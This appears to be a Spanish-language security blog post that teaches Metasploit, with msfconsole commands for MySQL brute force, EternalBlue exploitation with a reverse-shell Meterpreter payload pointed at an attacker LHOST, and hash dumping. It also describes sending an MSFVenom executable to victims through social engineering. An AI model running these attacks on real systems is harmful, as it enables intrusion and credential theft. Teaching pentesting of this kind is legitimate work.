Hacking con metasploit

 

www.onlinetis.com

Metasploit Framework es una herramienta fundamental en el mundo de la ciberseguridad, utilizada tanto por profesionales del pentesting (hacking ético) como por atacantes maliciosos. Su principal función es ayudar a identificar, explotar y validar vulnerabilidades en sistemas y redes.

Aquí tienes algunos ejemplos concretos de cómo se utiliza Metasploit, agrupados por el tipo de módulo que se usa:

1. Ataque de fuerza bruta (Módulos Auxiliares)

Metasploit puede automatizar ataques de fuerza bruta para adivinar contraseñas de servicios como SSH, FTP o bases de datos.

  • Escenario: Quieres obtener acceso a una máquina Linux cuyo usuario conoces (por ejemplo, "mario"), pero no su contraseña.

  • Proceso:

    1. Seleccionas el módulo auxiliar de fuerza bruta para SSH.

    2. Configuras el objetivo (la IP de la máquina) y el usuario ("mario").

    3. Le proporcionas a Metasploit una "wordlist" (un archivo con una lista de posibles contraseñas).

    4. Metasploit intenta automáticamente cada contraseña de la lista hasta encontrar la correcta, permitiendo que obtengas acceso al sistema.

2. Explotación de vulnerabilidades (Módulos Exploit)

Este es el uso más conocido de Metasploit, que aprovecha una vulnerabilidad específica en un software o sistema para obtener acceso.

  • Escenario: Descubres que un servidor web utiliza una versión antigua de un software que tiene una vulnerabilidad conocida (por ejemplo, Shellshock, con el CVE-2014-6271).

  • Proceso:

    1. Buscas el exploit correspondiente a esa vulnerabilidad dentro de Metasploit.

    2. Configuras el exploit con la IP de la máquina vulnerable.

    3. Seleccionas un "payload" (la carga útil que se ejecutará una vez que la vulnerabilidad sea explotada, como por ejemplo, una "reverse shell" que te dará una línea de comandos).

    4. Ejecutas el exploit, y si la máquina es vulnerable, obtendrás una sesión de control remoto.

3. Post-explotación (Módulos Post)

Una vez que has obtenido acceso a un sistema, Metasploit tiene módulos diseñados para realizar tareas adicionales.

  • Escenario: Has logrado obtener una shell en una máquina de un usuario sin privilegios de administrador.

  • Proceso:

    1. Usas un módulo post para escalar privilegios. Este módulo podría buscar y explotar una vulnerabilidad local para convertirte en el usuario "root" (en Linux) o "Administrador" (en Windows).

    2. Utilizas otros módulos para tareas como volcar hashes de contraseñas, tomar capturas de pantalla, o pivotar hacia otras máquinas en la misma red.

4. Generación de payloads (MSFVenom)

MSFVenom es una herramienta integrada en Metasploit que se usa para crear payloads personalizados.

  • Escenario: Quieres crear un archivo ejecutable malicioso que, cuando una víctima lo abra, te dé una sesión de Meterpreter (una shell avanzada de Metasploit).

  • Proceso:

    1. Usas MSFVenom para generar un archivo .exe con el payload de Meterpreter.

    2. Configuras tu máquina de atacante (el LHOST) y el puerto de escucha (LPORT) para recibir la conexión.

    3. Envías el archivo a la víctima a través de ingeniería social.

    4. Cuando la víctima ejecuta el archivo, se establece una conexión de vuelta a tu máquina, dándote control sobre su sistema.

       

      Aquí tienes ejemplos del uso de la consola de Metasploit, conocida como msfconsole, para realizar diferentes tareas de ciberseguridad.

      La msfconsole es la interfaz de línea de comandos principal de Metasploit Framework. Es una herramienta poderosa para probar vulnerabilidades en sistemas y redes.

      1. Escaneo de vulnerabilidades (Módulos Auxiliares)

      Los módulos auxiliares (auxiliary) se utilizan para tareas de reconocimiento y escaneo, sin explotar directamente una vulnerabilidad.

      • Objetivo: Identificar si un servidor está utilizando un servicio de base de datos MySQL y si tiene la configuración por defecto.

      • Comandos en msfconsole:

      Shell
      msf6 > use auxiliary/scanner/mysql/mysql_login
msf6 auxiliary(scanner/mysql/mysql_login) > set RHOSTS 192.168.1.100
msf6 auxiliary(scanner/mysql/mysql_login) > set USERNAME root
msf6 auxiliary(scanner/mysql/mysql_login) > run

      • Explicación:

        • use auxiliary/scanner/mysql/mysql_login: Carga el módulo auxiliar para intentar un ataque de fuerza bruta básico en un servicio de MySQL.

        • set RHOSTS 192.168.1.100: Define la dirección IP del objetivo.

        • set USERNAME root: Especifica el nombre de usuario a probar. Por defecto, este módulo intentará contraseñas comunes o nulas.

        • run: Ejecuta el módulo.

      2. Explotación de una vulnerabilidad (Módulos Exploit)

      Los módulos exploit son el corazón de Metasploit. Se utilizan para aprovechar una vulnerabilidad específica en un sistema objetivo y obtener acceso.

      • Objetivo: Explotar la vulnerabilidad de EternalBlue (MS17-010) en un sistema Windows vulnerable para obtener una sesión de control remoto.

      • Comandos en msfconsole:

      Shell
      msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.1.150
msf6 exploit(windows/smb/ms17_010_eternalblue) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.1.101
msf6 exploit(windows/smb/ms17_010_eternalblue) > run

      • Explicación:

        • use exploit/windows/smb/ms17_010_eternalblue: Carga el módulo de exploit para la vulnerabilidad EternalBlue.

        • set RHOSTS 192.168.1.150: Define la dirección IP del sistema Windows vulnerable.

        • set PAYLOAD windows/x64/meterpreter/reverse_tcp: Elige la carga útil (payload). En este caso, se usa meterpreter, que es una shell avanzada que se conectará desde la víctima (reverse) a tu máquina.

        • set LHOST 192.168.1.101: Define tu dirección IP, que es donde el payload debe conectarse.

        • run: Ejecuta el exploit. Si tiene éxito, se abrirá una sesión de Meterpreter.

      3. Post-Explotación (Módulos Post)

      Una vez que se tiene una sesión activa en un sistema comprometido, los módulos post se utilizan para realizar tareas adicionales, como recolectar información o escalar privilegios.

      • Objetivo: Obtener las contraseñas guardadas en un sistema Windows después de haber conseguido una sesión de Meterpreter.

      • Comandos en msfconsole:

      Shell
      msf6 > sessions
msf6 > sessions -i 1
meterpreter > run post/windows/gather/smart_hashdump

      • Explicación:

        • sessions: Muestra las sesiones activas de Meterpreter.

        • sessions -i 1: Entra en la sesión con el ID 1.

        • run post/windows/gather/smart_hashdump: Ejecuta el módulo post para volcar los hashes de las contraseñas del sistema, lo que permite descifrarlas más tarde.

Location: España

Entradas populares de este blog

Hacking y ciberseguridad en kali linux con Fping

Imagen
  www.onlinetis.com   Hacking y ciberseguridad en kali linux con Fping Fping es un programa similar a ping que utiliza la solicitud de eco del Protocolo de Mensajes de Control de Internet (ICMP) para determinar si un host objetivo responde. fping se diferencia de ping en que permite especificar cualquier número de objetivos en la línea de comandos o un archivo con las listas de objetivos a los que se hará ping. En lugar de enviar a un objetivo hasta que se agote el tiempo de espera o responda, fping envía un paquete de ping y pasa al siguiente objetivo mediante un sistema de turnos rotatorios. Como instalar:  sudo apt install fping fping Enviar paquetes ICMP ECHO_REQUEST a los hosts de la red   fping6 Compatibilidad con versiones anteriores de fping anteriores a la versión 4.0 El comando fping en Kali Linux es una utilidad de red que se utiliza para enviar paquetes de ICMP (Protocolo de mensajes de control de Internet) a varios hosts de forma simultánea. A diferen...
LEER MAS »

Hacking y ciberseguridad en kali linux con atk6-thcping6

Imagen
www.onlinetis.com Hacking y ciberseguridad en kali linux con atk6-thcping6 Parece que estás interesado en usar atk6-thcping6 en Kali Linux. Esta herramienta es parte del conjunto de utilidades thc-ipv6 , diseñado para probar las debilidades del protocolo IPv6. Para usar atk6-thcping6 , primero necesitas tener instalado el paquete thc-ipv6 . En la mayoría de las distribuciones de Kali, ya viene preinstalado, pero si no, puedes instalarlo con el siguiente comando: Bash sudo apt install thc-ipv6 Una vez que lo tienes instalado, la sintaxis básica para atk6-thcping6 es: Bash atk6-thcping6 <interface> <target> [opciones] Aquí está el desglose de los argumentos y opciones más comunes: <interface> : La interfaz de red que usarás para enviar el paquete. Por ejemplo, eth0 , wlan0 , etc. <target> : La dirección IPv6 del objetivo al que quieres hacer ping. [opciones] : Puedes usar varias opciones para modificar el comportamiento del ping. La mejor manera de ver todas la...
LEER MAS »

Como utilizar Fierce en kali linux

Imagen
  www.onlinetis.com   Como utilizar Fierce en kali linux Fierce es un escáner semiligero que ayuda a localizar direcciones IP no contiguas y nombres de host en dominios específicos. Está pensado como precursor de nmap, unicornscan, nessus, nikto, etc., ya que todos ellos requieren que se conozca previamente el espacio IP buscado. No realiza exploits ni escanea internet indiscriminadamente. Está diseñado específicamente para localizar objetivos probables tanto dentro como fuera de una red corporativa. Dado que utiliza principalmente DNS, es frecuente encontrar redes mal configuradas que filtran el espacio de direcciones interno. Esto es especialmente útil en malware dirigido. Originalmente escrito por RSnake y otros en http://ha.ckers.org/. Se trata simplemente de una conversión a Python 3 para simplificar y modernizar el código base. Como instalar: sudo apt install fierce Escáner DNS que ayuda a localizar espacios de IP no contiguos y nombres de host contra dominios específico...
LEER MAS »